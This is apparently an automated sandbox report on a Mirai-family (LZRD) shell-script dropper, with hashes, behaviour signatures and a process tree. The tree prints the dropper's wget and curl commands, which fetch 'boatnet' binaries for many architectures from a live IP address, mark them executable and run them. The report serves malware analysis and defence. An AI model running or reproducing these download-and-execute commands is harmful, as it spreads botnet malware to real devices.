Analysis
-
max time kernel
149s -
max time network
150s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
18-01-2025 03:08
Static task
static1
Behavioral task
behavioral1
Sample
21108cd356037b6622cfe4306a50ef020eea3b1bf569af187e8b50f4f92ddbd6.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
21108cd356037b6622cfe4306a50ef020eea3b1bf569af187e8b50f4f92ddbd6.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
21108cd356037b6622cfe4306a50ef020eea3b1bf569af187e8b50f4f92ddbd6.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
21108cd356037b6622cfe4306a50ef020eea3b1bf569af187e8b50f4f92ddbd6.sh
-
Size
2KB
-
MD5
95a4c9ceeaff1ba0b6b54a2ca6657d9b
-
SHA1
3d204079c491b73eb2e8000ad770bfb538f3bb79
-
SHA256
21108cd356037b6622cfe4306a50ef020eea3b1bf569af187e8b50f4f92ddbd6
-
SHA512
227a981ea250c3f5f7db4eca15456302c014893198d403001ee38f321ed7893c48d6ff50768fceefbdb6cb9592dd4192b31ed22baf4c96652fb527c1c1700f6b
Malware Config
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1564 chmod 1596 chmod 1660 chmod 1668 chmod 1582 chmod 1524 chmod 1548 chmod 1572 chmod 1642 chmod 1652 chmod 1532 chmod 1540 chmod 1556 chmod 1608 chmod 1624 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/WTF 1525 WTF /tmp/WTF 1533 WTF /tmp/WTF 1541 WTF /tmp/WTF 1549 WTF /tmp/WTF 1557 WTF /tmp/WTF 1565 WTF /tmp/WTF 1573 WTF /tmp/WTF 1583 WTF /tmp/WTF 1597 WTF /tmp/WTF 1609 WTF /tmp/WTF 1625 WTF /tmp/WTF 1643 WTF /tmp/WTF 1653 WTF /tmp/WTF 1661 WTF /tmp/WTF 1669 WTF -
Modifies Watchdog functionality 1 TTPs 30 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 30 IoCs
description ioc Process File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF -
resource yara_rule behavioral1/files/fstream-1.dat upx -
description ioc Process File opened for reading /proc/1347/cmdline WTF File opened for reading /proc/530/cmdline WTF File opened for reading /proc/733/cmdline WTF File opened for reading /proc/1026/cmdline WTF File opened for reading /proc/1358/cmdline WTF File opened for reading /proc/478/cmdline WTF File opened for reading /proc/724/cmdline WTF File opened for reading /proc/1544/cmdline WTF File opened for reading /proc/1156/cmdline WTF File opened for reading /proc/547/cmdline WTF File opened for reading /proc/1670/cmdline WTF File opened for reading /proc/1536/cmdline WTF File opened for reading /proc/1135/cmdline WTF File opened for reading /proc/927/cmdline WTF File opened for reading /proc/488/cmdline WTF File opened for reading /proc/564/cmdline WTF File opened for reading /proc/969/cmdline WTF File opened for reading /proc/1197/cmdline WTF File opened for reading /proc/1200/cmdline WTF File opened for reading /proc/1544/cmdline WTF File opened for reading /proc/1026/cmdline WTF File opened for reading /proc/1528/cmdline WTF File opened for reading /proc/1328/cmdline WTF File opened for reading /proc/1319/cmdline WTF File opened for reading /proc/453/cmdline WTF File opened for reading /proc/1542/cmdline WTF File opened for reading /proc/1670/cmdline WTF File opened for reading /proc/1102/cmdline WTF File opened for reading /proc/1646/cmdline WTF File opened for reading /proc/462/cmdline WTF File opened for reading /proc/1654/cmdline WTF File opened for reading /proc/1264/cmdline WTF File opened for reading /proc/1051/cmdline WTF File opened for reading /proc/978/cmdline WTF File opened for reading /proc/1241/cmdline WTF File opened for reading /proc/1566/cmdline WTF File opened for reading /proc/504/cmdline WTF File opened for reading /proc/1264/cmdline WTF File opened for reading /proc/1026/cmdline WTF File opened for reading /proc/539/cmdline WTF File opened for reading /proc/1672/cmdline WTF File opened for reading /proc/671/cmdline WTF File opened for reading /proc/1081/cmdline WTF File opened for reading /proc/1182/cmdline WTF File opened for reading /proc/1201/cmdline WTF File opened for reading /proc/1098/cmdline WTF File opened for reading /proc/480/cmdline WTF File opened for reading /proc/1664/cmdline WTF File opened for reading /proc/978/cmdline WTF File opened for reading /proc/1319/cmdline WTF File opened for reading /proc/1241/cmdline WTF File opened for reading /proc/1170/cmdline WTF File opened for reading /proc/706/cmdline WTF File opened for reading /proc/1163/cmdline WTF File opened for reading /proc/414/cmdline WTF File opened for reading /proc/462/cmdline WTF File opened for reading /proc/498/cmdline WTF File opened for reading /proc/656/cmdline WTF File opened for reading /proc/1574/cmdline WTF File opened for reading /proc/978/cmdline WTF File opened for reading /proc/466/cmdline WTF File opened for reading /proc/1519/cmdline WTF File opened for reading /proc/462/cmdline WTF File opened for reading /proc/1508/cmdline WTF -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1530 curl 1529 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/WTF 21108cd356037b6622cfe4306a50ef020eea3b1bf569af187e8b50f4f92ddbd6.sh File opened for modification /tmp/boatnet.spc wget File opened for modification /tmp/boatnet.m68k curl File opened for modification /tmp/boatnet.i686 curl File opened for modification /tmp/boatnet.arm7 wget File opened for modification /tmp/boatnet.arm7 curl File opened for modification /tmp/boatnet.arm curl File opened for modification /tmp/boatnet.arm6 curl File opened for modification /tmp/boatnet.ppc wget File opened for modification /tmp/boatnet.m68k wget File opened for modification /tmp/boatnet.mips curl File opened for modification /tmp/boatnet.i468 curl File opened for modification /tmp/boatnet.arm wget File opened for modification /tmp/boatnet.sh4 wget File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/boatnet.arc curl File opened for modification /tmp/boatnet.mpsl wget File opened for modification /tmp/boatnet.arc wget File opened for modification /tmp/boatnet.spc curl File opened for modification /tmp/boatnet.arm6 wget File opened for modification /tmp/boatnet.ppc curl File opened for modification /tmp/boatnet.mips wget File opened for modification /tmp/boatnet.x86_64 curl File opened for modification /tmp/boatnet.mpsl curl File opened for modification /tmp/boatnet.arm5 wget File opened for modification /tmp/boatnet.arm5 curl File opened for modification /tmp/boatnet.sh4 curl File opened for modification /tmp/boatnet.x86 curl
Processes
-
/tmp/21108cd356037b6622cfe4306a50ef020eea3b1bf569af187e8b50f4f92ddbd6.sh/tmp/21108cd356037b6622cfe4306a50ef020eea3b1bf569af187e8b50f4f92ddbd6.sh1⤵
- Writes file to tmp directory
PID:1516 -
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:1518
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:1522
-
-
/bin/catcat boatnet.x862⤵PID:1523
-
-
/bin/chmodchmod +x 21108cd356037b6622cfe4306a50ef020eea3b1bf569af187e8b50f4f92ddbd6.sh boatnet.x86 config-err-kM39Xd netplan_6s4sb40f snap-private-tmp ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-bolt.service-qwgTpB systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-GAP7dZ systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-timedated.service-GmcJAc WTF2⤵
- File and Directory Permissions Modification
PID:1524
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1525
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1529
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1530
-
-
/bin/chmodchmod +x 21108cd356037b6622cfe4306a50ef020eea3b1bf569af187e8b50f4f92ddbd6.sh boatnet.mips boatnet.x86 config-err-kM39Xd netplan_6s4sb40f snap-private-tmp ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-bolt.service-qwgTpB systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-GAP7dZ systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-timedated.service-GmcJAc WTF2⤵
- File and Directory Permissions Modification
PID:1532
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1533
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:1537
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:1538
-
-
/bin/chmodchmod +x 21108cd356037b6622cfe4306a50ef020eea3b1bf569af187e8b50f4f92ddbd6.sh boatnet.arc boatnet.mips boatnet.x86 config-err-kM39Xd netplan_6s4sb40f snap-private-tmp ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-bolt.service-qwgTpB systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-GAP7dZ systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-timedated.service-GmcJAc WTF2⤵
- File and Directory Permissions Modification
PID:1540
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1541
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/boatnet.i4682⤵PID:1545
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/boatnet.i4682⤵
- Writes file to tmp directory
PID:1546
-
-
/bin/chmodchmod +x 21108cd356037b6622cfe4306a50ef020eea3b1bf569af187e8b50f4f92ddbd6.sh boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-kM39Xd netplan_6s4sb40f snap-private-tmp ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-bolt.service-qwgTpB systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-GAP7dZ systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-timedated.service-GmcJAc WTF2⤵
- File and Directory Permissions Modification
PID:1548
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1549
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/boatnet.i6862⤵PID:1553
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/boatnet.i6862⤵
- Writes file to tmp directory
PID:1554
-
-
/bin/chmodchmod +x 21108cd356037b6622cfe4306a50ef020eea3b1bf569af187e8b50f4f92ddbd6.sh boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-kM39Xd netplan_6s4sb40f snap-private-tmp ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-bolt.service-qwgTpB systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-GAP7dZ systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-timedated.service-GmcJAc WTF2⤵
- File and Directory Permissions Modification
PID:1556
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1557
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/boatnet.x86_642⤵PID:1561
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/boatnet.x86_642⤵
- Writes file to tmp directory
PID:1562
-
-
/bin/chmodchmod +x 21108cd356037b6622cfe4306a50ef020eea3b1bf569af187e8b50f4f92ddbd6.sh boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-kM39Xd netplan_6s4sb40f snap-private-tmp ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-bolt.service-qwgTpB systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-GAP7dZ systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-timedated.service-GmcJAc WTF2⤵
- File and Directory Permissions Modification
PID:1564
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1565
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:1569
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:1570
-
-
/bin/chmodchmod +x 21108cd356037b6622cfe4306a50ef020eea3b1bf569af187e8b50f4f92ddbd6.sh boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-kM39Xd netplan_6s4sb40f snap-private-tmp ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-bolt.service-qwgTpB systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-GAP7dZ systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-timedated.service-GmcJAc WTF2⤵
- File and Directory Permissions Modification
PID:1572
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1573
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:1577
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:1578
-
-
/bin/chmodchmod +x 21108cd356037b6622cfe4306a50ef020eea3b1bf569af187e8b50f4f92ddbd6.sh boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-kM39Xd netplan_6s4sb40f snap-private-tmp ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-GAP7dZ systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-timedated.service-GmcJAc WTF2⤵
- File and Directory Permissions Modification
PID:1582
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1583
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:1587
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:1592
-
-
/bin/chmodchmod +x 21108cd356037b6622cfe4306a50ef020eea3b1bf569af187e8b50f4f92ddbd6.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-kM39Xd netplan_6s4sb40f snap-private-tmp ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-GAP7dZ systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-timedated.service-GmcJAc WTF2⤵
- File and Directory Permissions Modification
PID:1596
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1597
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:1601
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:1606
-
-
/bin/chmodchmod +x 21108cd356037b6622cfe4306a50ef020eea3b1bf569af187e8b50f4f92ddbd6.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-kM39Xd netplan_6s4sb40f snap-private-tmp ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-bolt.service-684ALP systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-GAP7dZ systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-timedated.service-GmcJAc WTF2⤵
- File and Directory Permissions Modification
PID:1608
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1609
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:1613
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:1620
-
-
/bin/chmodchmod +x 21108cd356037b6622cfe4306a50ef020eea3b1bf569af187e8b50f4f92ddbd6.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-kM39Xd netplan_6s4sb40f snap-private-tmp ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-GAP7dZ systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-timedated.service-GmcJAc WTF2⤵
- File and Directory Permissions Modification
PID:1624
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1625
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
PID:1629
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
PID:1634
-
-
/bin/chmodchmod +x 21108cd356037b6622cfe4306a50ef020eea3b1bf569af187e8b50f4f92ddbd6.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 config-err-kM39Xd netplan_6s4sb40f snap-private-tmp ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-bolt.service-EhZrSK systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-GAP7dZ systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-timedated.service-GmcJAc WTF2⤵
- File and Directory Permissions Modification
PID:1642
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1643
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:1647
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:1650
-
-
/bin/chmodchmod +x 21108cd356037b6622cfe4306a50ef020eea3b1bf569af187e8b50f4f92ddbd6.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-kM39Xd netplan_6s4sb40f snap-private-tmp ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-GAP7dZ systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-timedated.service-GmcJAc WTF2⤵
- File and Directory Permissions Modification
PID:1652
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1653
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
PID:1657
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
PID:1658
-
-
/bin/chmodchmod +x 21108cd356037b6622cfe4306a50ef020eea3b1bf569af187e8b50f4f92ddbd6.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-kM39Xd netplan_6s4sb40f snap-private-tmp ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-GAP7dZ systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-timedated.service-GmcJAc WTF2⤵
- File and Directory Permissions Modification
PID:1660
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1661
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/boatnet.sh42⤵
- Writes file to tmp directory
PID:1665
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/boatnet.sh42⤵
- Writes file to tmp directory
PID:1666
-
-
/bin/chmodchmod +x 21108cd356037b6622cfe4306a50ef020eea3b1bf569af187e8b50f4f92ddbd6.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 config-err-kM39Xd netplan_6s4sb40f snap-private-tmp ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-GAP7dZ systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-timedated.service-GmcJAc WTF2⤵
- File and Directory Permissions Modification
PID:1668
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1669
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD5313c4b235e0e62ca38eb04bfa7677e44
SHA1c31d5d0c0fa4bfa4ea2837cede424504c68ccfd3
SHA256dfd6f81327b03f5336895c6bed7bfff178a054eafef5637ccb74e7a0ac4ef4c4
SHA5120bf52b087e48b6daac55f735ae5b5af7626322db3200e72c61755d6b80234c503a02f3e35b340b70d1731fdec2054f530251504dec55497ca5877f9233ff54ad